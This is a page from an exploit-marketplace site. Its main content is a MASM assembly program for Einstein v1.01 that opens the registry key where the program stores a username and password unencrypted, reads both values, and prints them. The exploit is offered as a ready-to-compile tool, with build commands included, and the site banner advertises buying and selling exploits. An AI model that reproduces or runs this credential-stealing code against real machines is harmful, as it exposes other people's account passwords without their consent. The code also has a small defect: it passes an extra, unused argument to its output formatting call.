0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Einstein <= 1.01 Local Password Disclosure Exploit (asm)
======================================================== Einstein <= 1.01 Local Password Disclosure Exploit (asm) ======================================================== ; Nothing Special other than the program doesnt encode the user/pass in the registry. ; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program ; made because i think C is overkill for these types of local exploits, ; shit we can does this in vbs/bat too if ya want ;Compiles in Masm ;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm ;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj .386 .model flat, stdcall option casemap :none include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\shell32.inc include \masm32\include\advapi32.inc include \masm32\include\masm32.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\shell32.lib includelib \masm32\lib\advapi32.lib includelib \masm32\lib\masm32.lib literal MACRO quoted_text:VARARG LOCAL local_text .data local_text db quoted_text,0 .code EXITM <local_text> ENDM SADD MACRO quoted_text:VARARG EXITM <ADDR literal(quoted_text)> ENDM .data SubKey db "Software\\einstein",0 szUser db "username",0 szPass db "password",0 noExeem db "Einstein v1.01 is not installed on your pc!",0 Theoutput db '_______________________________________________________________',13,10 db '* Einstein v1.01 Local Pass Exploit *',13,10 db '* Based On Kozans code in C *',13,10 db '* by illwill - xillwillx@yahoo.com *',13,10 db '*_____________________________________________________________*',13,10 db ' UserName: %s ',13,10 db ' Password: %s ',13,10,0 KeySize DWORD 255 .data? TheIPData db 64 dup (?) TheUSERData db 64 dup (?) ThePASSData db 64 dup (?) TheReturn DWORD ? strbuf db 258 dup (?) .code start: invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn .IF eax==ERROR_SUCCESS invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize .IF KeySize < 2 invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND") .ENDIF invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize .IF KeySize < 2 invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND") .ENDIF invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData invoke StdOut, addr strbuf .ELSE invoke StdOut, addr noExeem .ENDIF invoke RegCloseKey , TheReturn Invoke ExitProcess,0 end start ; # 0day.today [2024-07-08] #